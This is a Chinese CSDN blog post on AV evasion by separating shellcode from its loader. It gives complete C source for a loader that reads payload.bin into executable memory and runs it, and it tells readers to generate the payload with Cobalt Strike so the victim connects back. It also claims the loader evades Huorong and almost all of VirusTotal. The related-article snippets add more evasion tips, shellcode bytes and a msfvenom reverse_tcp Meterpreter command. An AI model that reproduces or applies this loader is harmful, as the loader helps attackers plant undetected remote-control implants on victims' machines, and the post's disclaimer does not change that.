C实现分离免杀

已于 2023-06-29 21:22:22 修改
阅读量2.4k 收藏 24
点赞数 4
分类专栏: 免杀 文章标签: 免杀
于 2021-02-28 15:40:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/114225541
版权

本文章仅用于交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

前期准备

1.编译好mian.exe,源码如下

#include <stdio.h>
#include <windows.h>

int main(int argc,char* argv[])
{ 
	//打开要执行的ShellCode文件
	HANDLE hFile = CreateFileA("payload.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL);
	if (hFile==INVALID_HANDLE_VALUE)
	{
		printf("CreateFile Error");
		return -1;
	}

	DWORD dwSize = 0;
	//获取ShellCode的总大小
	dwSize = GetFileSize(hFile, NULL);

	//申请一块可读可写可执行的内存
	LPVOID lpAddress = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (lpAddress == NULL)
	{
		printf("VirtualAlloc Error");
		CloseHandle(hFile);
		return -1;
	}

	//将文件读取到申请的内存中
	DWORD dwRead = 0;
	ReadFile(hFile, lpAddress, dwSize, &dwRead, 0);

	//执行ShellCode
	__asm
	{
		call lpAddress;
	}
	return 0;
}

2.cs生成payload.bin,此bin文件多数杀软不查杀的,思路就是利用mian.exe来执行payload.bin上线cs。
注:payload.bin和mian.exe要处于同一目录下

在这里插入图片描述
在这里插入图片描述

火绒
在这里插入图片描述

VT查杀70/1
在这里插入图片描述

春日野穹ㅤ
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c语言免杀,cs免杀
weixin_42306938的博客
05-22 917
思路①利用c语言+veil实现免杀#include "pch.h"//可以删除#include #include #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\...
c语言免杀花指令大全,免杀花指令
weixin_36219745的博客
05-18 886
今天送上经典花指令注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果.push ebppop ebppush eaxpop eaxpush esppop esppush 0push 0push 10 -------其中数字可以任意,注意与下面对应push -10nop -----------可任意在中间添加与它等效的:mov EDI,EDIadd esp,1 -------其中数字可...
c语言免杀火绒
记录学习,一起进步
11-18 725
c语言随机数异或加密免杀
C语言绕过杀毒软件,易语言插件规避杀毒软件方法
weixin_28716723的博客
05-19 1798
易语言是一门计算机编程语言,非常的简单易懂,学习的时候无需英语基础即可快速入门。同时易语言的兼容性和稳定性也比较的强大,我们可以用他开发出各种平台的应用软件、网络软件、信息管理软件等等,但是由于易语言是中文编程,好多杀软都会误报,下面就教大家一个简单的方法,防止易语言误报。1、这里就不给大家演示易语言的安装过程了,官方的语言视频教程已经很详细了,我们首先去下载下“黑月插件”,直接百度,第一个就可以...
免杀/免杀-小白漏洞笔记
最新发布
程序员三九的博客
07-21 369
MSF 已经是广为人知的非常流行的渗透平台,没有之一。而作为专注于后渗透的我,最常用的也是 MSF 强大的后渗透功能。
C++免杀
weixin_33866037的博客
10-31 367
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为M...
C/C++ 实现切片免杀的思路
热门推荐
CSDN
10-20 1万+
今天突然想到了一个好玩的免杀思路,原理就是想办法切断磁盘特征与内存特征,关于沙盒免杀我寻思着,这样可以将不同的的DLL映射到内存,在内存中他们的特征也是被切断的,在注入器上做判断如果是沙盒则不加载,不是则分别注入三个甚至是更多的DLL,将我们的ShellCode切片力度更细,分配到几百个甚至上千个DLL上面,做成一个链,应该可以,没尝试过,抽空可以试试。 如果我们把粒度变得细致,捕捉特征也会变...
c语言免杀程序源码,Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_30427953的博客
05-18 873
作者:冷锋(LengF)[BHST]博客:www.81sec.com时间:2011-5-220x00概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c源...
通过Python实现Payload分离免杀过程详解
01-19
实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x...
免杀分离免杀(python)_shellcode loader免杀
2401_84140130的博客
04-27 198
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode。
2024年Python最新【免杀分离免杀(python)_shellcode loader免杀
2401_84585462的博客
05-01 425
import sysf.close()loader加密。
1_visualc++_免杀_GHO0ST_远控_源码免杀
09-11
加远程定位 修复win10上线源码 免杀所有杀毒软件
Payload分离免杀绕过杀软
干铮的博客
10-14 3054
Payload分离免杀绕过杀软 杀毒软件的原理是根据特征、行为、基于云查杀,云查杀主要是根据特征码进行查杀,每一种杀毒软件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流杀软。 1.C语言编译后门 root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \ > -p windows/meterpreter/reverse_tcp \ > -b '\x00\x0b' LHOST=123.56.138
如何利用十行C++代码,绕过杀毒软件实现免杀
03-17 2826
我相信大部分的读者都会同意这个观点,绕过大部分杀毒软件的基本方法都很平常没什么特殊的。然而,我也偶尔会遇到一些人仅仅依靠工具生成二进制文件,这些文件很容易被杀毒软件通过指纹标记出来。本文主要是为这些人所准备的。 下面是小编整理好的一套C/C++资料,加小编C/C++编程学习群825414254,获取系统性学习C/C++的学习资料 在我们开始接触这段小巧的 C++ 代码前,我想先介绍一个可以非常...
CS分离免杀实践
痴人说梦梦中人
08-02 2296
CS分离免杀实战一、原理简述二、环境配置三、本地测试1.生成shellcode2.代码变形3.pyinstaller打包4.免杀测试 本次实践参考小刚师傅的教程,详细原理请看原文:https://mp.weixin.qq.com/ 一、原理简述           通过python requests远程下载经过base64编码后的shellcode和loader,然后解码通过exec函数先执行loader,
远控免杀从入门到实践(3)-代码篇-C/C++
weixin_46236101的博客
03-13 1854
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实.
c语言免杀程序源码,【程序源码】用纯C语言实现坦克大战
weixin_30663839的博客
05-18 226
/* time:2017/1/15 *//* edit:www.dotcpp.com */#include#include#include#include#include#define KEY_ESC 0x01#define KEY_SPACE 0x39#define KEY_UP 0x48#define KEY_LEFT 0x4b#define KEY_RIGHT 0x4d#define KEY...
免杀-Shellcode分离隐藏&C++
qq_45087791的博客
02-27 1587
Shellcode分离隐藏-让杀毒找不到。离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的ShellCode通过分块传输的方法上传然后再拼接,这些体现了基本的"分离"思想。
exe免杀c语言,实验使用 C 编译 shellcode 免杀上线
weixin_39540018的博客
05-19 614
实验了一下这篇文章里面介绍的免杀方法:[使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tin...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值